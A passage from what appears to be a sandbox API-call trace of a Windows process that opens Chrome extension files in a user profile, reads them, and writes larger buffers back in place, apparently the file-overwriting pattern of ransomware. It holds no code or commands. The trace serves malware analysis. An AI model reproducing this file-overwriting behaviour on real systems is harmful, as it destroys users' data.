lpUsedDefaultChar=0x0) returned 13 [0139.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.915] ReadFile (in: hFile=0x1cc, lpBuffer=0x26d3c08, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26d3c08*, lpNumberOfBytesRead=0x345f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0139.916] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0139.916] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0139.916] CloseHandle (hObject=0x1cc) returned 1 [0139.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0139.917] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.917] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb3 [0139.918] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.918] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.918] ReleaseMutex (hMutex=0x168) returned 1 [0139.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.918] ReadFile (in: hFile=0x1cc, lpBuffer=0x26d3c08, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26d3c08*, lpNumberOfBytesRead=0x345f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0139.919] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0139.919] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0139.919] CloseHandle (hObject=0x1cc) returned 1 [0139.920] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0139.920] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.920] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb3 [0139.921] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.921] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.921] ReleaseMutex (hMutex=0x168) returned 1 [0139.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.921] ReadFile (in: hFile=0x1cc, lpBuffer=0x26d3c08, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26d3c08*, lpNumberOfBytesRead=0x345f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0139.922] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0139.922] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0139.923] CloseHandle (hObject=0x1cc) returned 1 [0139.923] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0139.924] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.924] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb3 [0139.924] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.924] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.924] ReleaseMutex (hMutex=0x168) returned 1 [0139.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.924] ReadFile (in: hFile=0x1cc, lpBuffer=0x26d3c08, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26d3c08*, lpNumberOfBytesRead=0x345f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0139.926] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0139.926] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0139.926] CloseHandle (hObject=0x1cc) returned 1 [0139.926] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0139.927] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.927] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb3 [0139.927] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.927] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.927] ReleaseMutex (hMutex=0x168) returned 1 [0139.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.927] ReadFile (in: hFile=0x1cc, lpBuffer=0x26d3c08, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26d3c08*, lpNumberOfBytesRead=0x345f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0139.928] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0139.928] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0139.929] CloseHandle (hObject=0x1cc) returned 1 [0139.929] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0139.930] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.930] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x5c [0139.930] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.930] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.930] ReleaseMutex (hMutex=0x168) returned 1 [0139.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.html", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0139.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.html", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="main.html", lpUsedDefaultChar=0x0) returned 9 [0139.930] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fbad70, nNumberOfBytesToRead=0x5c, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbad70*, lpNumberOfBytesRead=0x345f2bc*=0x5c, lpOverlapped=0x0) returned 1 [0139.932] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0139.932] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x5e4, lpOverlapped=0x0) returned 1 [0139.932] CloseHandle (hObject=0x1cc) returned 1 [0139.932] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0139.934] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.934] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xdc [0139.934] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.934] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.934] ReleaseMutex (hMutex=0x168) returned 1 [0139.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.935] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c5048, nNumberOfBytesToRead=0xdc, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c5048*, lpNumberOfBytesRead=0x345f2bc*=0xdc, lpOverlapped=0x0) returned 1 [0139.936] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0139.936] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x664, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x664, lpOverlapped=0x0) returned 1 [0139.936] CloseHandle (hObject=0x1cc) returned 1 [0139.936] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0139.937] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.937] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xdf [0139.937] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.937] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.937] ReleaseMutex (hMutex=0x168) returned 1 [0139.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.937] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c5048, nNumberOfBytesToRead=0xdf, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c5048*, lpNumberOfBytesRead=0x345f2bc*=0xdf, lpOverlapped=0x0) returned 1 [0139.938] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0139.939] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x667, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x667, lpOverlapped=0x0) returned 1 [0139.939] CloseHandle (hObject=0x1cc) returned 1 [0139.939] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0139.940] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.940] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe0 [0139.940] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.940] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.940] ReleaseMutex (hMutex=0x168) returned 1 [0139.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.940] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c5048, nNumberOfBytesToRead=0xe0, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c5048*, lpNumberOfBytesRead=0x345f2bc*=0xe0, lpOverlapped=0x0) returned 1 [0139.941] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0139.941] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x668, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x668, lpOverlapped=0x0) returned 1 [0139.941] CloseHandle (hObject=0x1cc) returned 1 [0139.942] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0139.942] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.942] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe6 [0139.942] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.942] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.942] ReleaseMutex (hMutex=0x168) returned 1 [0139.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.943] ReadFile (in: hFile=0x1cc, lpBuffer=0x2697508, nNumberOfBytesToRead=0xe6, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697508*, lpNumberOfBytesRead=0x345f2bc*=0xe6, lpOverlapped=0x0) returned 1 [0139.944] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0139.944] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x66e, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x66e, lpOverlapped=0x0) returned 1 [0139.944] CloseHandle (hObject=0x1cc) returned 1 [0139.944] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0139.945] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.945] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe1 [0139.945] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0139.945] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.945] ReleaseMutex (hMutex=0x168) returned 1 [0139.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, 